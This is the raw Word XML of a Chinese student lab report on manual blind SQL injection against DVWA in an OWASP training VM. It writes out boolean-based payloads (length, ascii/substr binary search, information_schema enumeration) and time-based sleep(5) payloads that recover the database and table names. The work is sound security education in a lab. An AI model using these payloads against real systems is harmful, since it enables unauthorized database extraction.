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0D40F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>《软件安全》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B44D9E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="华文仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>姓名：蒋枘言  学号：2313546  班级：信息安全班</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05127E25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、实验名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317DF974">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A79F1E">
      <w:pPr>
        <w:widowControl w:val="0"/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SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA66DB2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="422" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8FFD2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、实验要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F02818">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783F19E0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基于DVWA里的SQL盲注案例，实施手工盲注，参考课本，撰写实验报告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D09B91">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08ECC074">
      <w:pPr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三、实验过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9FCD25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C04041">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体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</w:rPr>
        <w:t>（一）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>搭建OWASP靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381ED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35228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直接打开OWASP虚拟机，登录的用户名是root，密码是owaspbwa。登录成功后，在kali虚拟机里访问出现的地址（这里是192.168.220.133）即可进入到OWASP界面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8B972A">
      <w:pPr>
        <w:widowControl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089400" cy="1733550"/>
            <wp:effectExtent l="9525" t="9525" r="158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1733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BBFCFF7">
      <w:pPr>
        <w:widowControl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064000" cy="3048000"/>
            <wp:effectExtent l="9525" t="9525" r="1587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9393D5D">
      <w:pPr>
        <w:widowControl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3578225"/>
            <wp:effectExtent l="0" t="0" r="317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9A6C0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E49E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选择Damn Vulnerable Web Application，用户名和密码均为admin，进入界面。确保将“Script Security”改成low。这样OWASP靶机搭建完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155285EA">
      <w:pPr>
        <w:widowControl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3220085"/>
            <wp:effectExtent l="0" t="0" r="1206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0E563">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B32A40">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体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二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基于布尔的SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17929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1E169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选择SQL Injection (Blind) 一栏，分别输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and 1=1 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and 1=2 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（注意单引号是直引号，不是弯引号）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，发现分别显示存在、存在和不存在。说明存在SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514764F2">
      <w:pPr>
        <w:widowControl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536065"/>
            <wp:effectExtent l="9525" t="9525" r="15875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36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C8F2591">
      <w:pPr>
        <w:widowControl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1521460"/>
            <wp:effectExtent l="9525" t="9525" r="12065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1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6547D6E">
      <w:pPr>
        <w:widowControl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955675"/>
            <wp:effectExtent l="0" t="0" r="1270" b="952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59415">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C16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现在开始猜解数据库的名字。为了猜解数据库的名字，首先需要猜解数据库名的长度，然后再逐一猜解名字。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04569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依次输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and length(database()) = 1 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and length(database()) = 2 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and length(database()) = 3 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，均发现不存在；直到输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and length(database()) = 4 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，发现存在，说明数据库名的长度为4。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A7E3D5">
      <w:pPr>
        <w:widowControl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521460"/>
            <wp:effectExtent l="9525" t="9525" r="12065" b="1841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1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5E3C723">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262A3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现在使用二分法来猜解数据库名：输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and ascii(substr(database(), 1, 1))&gt;97 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示存在，说明数据库名的第一个字符的ASCII值大于97（a）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4487F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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and ascii(substr(database(), 1, 1))&lt;122 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示存在，说明数据库名的第一个字符的 ASCII值小于122（z）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D7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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and ascii(substr(database(), 1, 1))&lt;109 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示存在，说明数据库名的第一个字符的ASCII值小于109（m）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED2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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and ascii(substr(database(), 1, 1))&lt;103 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示存在，说明数据库名的第一个字符的ASCII值小于103（g）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73081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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and ascii(substr(database(), 1, 1))&lt;100 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示不存在，说明数据库名的第一个字符的ASCII值不小于100（d）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657D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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and ascii(substr(database(), 1, 1))&gt;100 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示不存在，说明数据库名的第一个字符的ASCII值不大于100，所以数据库名的第一个字符的ASCII值为100，即小写字母d。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE8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重复以上步骤即可猜解出完整的数据库名，即dvwa。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E45AC83">
      <w:pPr>
        <w:widowControl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498600"/>
            <wp:effectExtent l="9525" t="9525" r="15875" b="1587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8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18075AC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6510C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现在开始猜解数据库表的数量和名字。首先需要猜解数据库表的数量，同样可以从1开始一个一个试，也可以使用二分法。当输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=database())=2 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时，显示存在，说明表的数量为2。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E394E2">
      <w:pPr>
        <w:widowControl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1197610"/>
            <wp:effectExtent l="9525" t="9525" r="12065" b="1206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7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2F29404C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A591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现在开始逐一猜解表名。同样也是先猜解表名长度，然后猜解内容。对于第一个表：输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and length(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0, 1), 1))=9 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，发现存在，说明第一个表的表名长度为9；输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0, 1), 1, 1)) = 103 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，发现存在，说明第一个表的表名的第一个字母是g。按照同样的方法得到两个表的表名分别是guestbook和users。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C186DB">
      <w:pPr>
        <w:widowControl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981710"/>
            <wp:effectExtent l="9525" t="9525" r="12700" b="1206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81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E85FEC2">
      <w:pPr>
        <w:widowControl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947420"/>
            <wp:effectExtent l="9525" t="9525" r="20320" b="2095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47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DEAFA86">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4D3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按照同样的方法可以得到表中的每个字段名，这里不再赘述。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618D8900">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E99C028">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体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三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基于时间的SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0339B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7B645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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>and sleep(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，感觉到明显延迟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输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>l and sleep(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，没有延迟。说明存在字符型的基于时间的SQL盲注。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFD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猜解当前数据库名字长度：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and if(length(database())=1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sleep(5), 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，没有延迟；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and if(length(database())=4,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sleep(5),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> #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有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>明显延迟。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据库名字长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为4。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7CA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采用二分法猜解数据库名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and if(ascii(substr(database(), 1, 1)&gt;97,sleep(5), 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> #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有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>明显延迟。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5EE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以此类推，猜解表、字段和数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E2E5BE">
      <w:pPr>
        <w:widowControl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519555"/>
            <wp:effectExtent l="9525" t="9525" r="15875" b="2032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9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9AFB324">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="030EC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运用基于时间的SQL盲注，同样也可以得到数据库的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A81E8C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
